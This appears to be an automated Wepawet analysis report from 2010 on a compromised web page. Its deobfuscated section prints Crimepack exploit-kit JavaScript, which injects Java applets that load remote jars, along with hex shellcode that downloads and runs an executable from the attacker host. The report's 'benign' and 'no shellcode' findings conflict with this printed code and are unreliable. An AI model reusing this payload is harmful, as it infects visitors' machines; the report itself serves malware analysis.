Wepawet

Home | About | Sample Reports | Tools | News Log in | Register

Analysis report for http://www.assetmancomcareers.com/vasek/konec.php

Sample Overview

URL	http://www.assetmancomcareers.com/vasek/konec.php
MD5	fd0df9da22426cf82cd69e1f9dcafc15
Analysis Started	2010-04-14 08:54:08
Report Generated	2010-04-14 08:55:25
Jsand version	1.02.02

See the report for domain www.assetmancomcareers.com.

Detection results

Detector	Result
Jsand 1.02.02	benign

Exploits

No exploits were identified.

Deobfuscation results

Evals

No evals.

Writes

• <body><script language="javascript">function JAVA(){
    function JAVASGB(){
      var zDiv = document.createElement('DIV');
      zDiv.id = 'z';
      document.body.appendChild(zDiv);
      zDiv.innerHTML = "
  <applet code='crimepack' archive='http://www.assetmancomcareers.com/vasek/files/gsb50.jar'
   width='1' height='1'><param name='sc' value='505351525657559CE8000000005D83ED0D31C0640340
  30780C8B400C8B701CAD8B4008EB098B40348D407C8B403C5657BE5E01000001EEBF4E01000001EFE8D6010000
  5F5E89EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356302000080FB0074
  06881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A
  0089EA81C25E0100005289EA81C278020000526A00FFD06A0589EA81C25E01000052FF955A01000089EA81C25E
  010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356E02000080FB007406881C3246EBEE
  C604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E01
  00005289EA81C2A6020000526A00FFD06A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C3000000
  0000000000000000000000000047657454656D705061746841004C6F61644C696272617279410047657450726F
  63416464726573730057696E4578656300BB89F289F730C0AE75FD29F789F931C0BE3C00000003B51B02000066
  AD03851B0200008B707883C61C03B51B0200008DBD1F020000AD03851B020000ABAD03851B02000050ABAD0385
  1B020000AB5E31DBAD5603851B02000089C689D751FCF3A65974045E43EBE95E93D1E003852702000031F69666
  ADC1E00203851F02000089C6AD03851B020000C3EB100000000000000000000000000000000089851B02000056
  57E858FFFFFF5F5EAB01CE803EBB7402EBEDC355524C4D4F4E2E444C4C0055524C446F776E6C6F6164546F4669
  6C6541007064667570642E6578650063726173682E70687000687474703A2F2F7777772E61737365746D616E63
  6F6D636172656572732E636F6D2F766173656B2F6C6F61646A617661642E7068703F653D39266E3D0090'><par
  am name='np' value='90909090'></applet>";
      /*alert('JAVASGB');*/
    }
    function JAVABOF(){
      var yDiv = document.createElement('DIV');
      yDiv.id = 'y';
      document.body.appendChild(yDiv);
      yDiv.innerHTML = "
  <applet code='zzz.ttt.ad3740b4.class' archive='http://www.assetmancomcareers.com/vasek/fil
  es/common.jar' width='200' height='200'><param name='data' value='http://www.assetmancomca
  reers.com/vasek/loadjavad.php?e=3&n='><param name='cc' value='1'></applet>";
      /*alert('JAVABOF')*/
    }
    setTimeout(JAVASGB, 5);
    setTimeout(JAVABOF, 2000);
  }
  JAVA();
  </script><div id='z'></div><div id='y'></div></body>
  

  (repeated 1 time)

Network Activity

Requests

URL	Status	Content Type
http://www.assetmancomcareers.com/vasek/konec.php	200	text/html
http://www.assetmancomcareers.com/vasek/js/dat.js	200	text/javascript

Redirects

No redirects.

ActiveX controls

No objects/controls.

Shellcode and Malware

No shellcode was identified.

No additional malware was retrieved.

© 2008–2012 The Regents of the University of California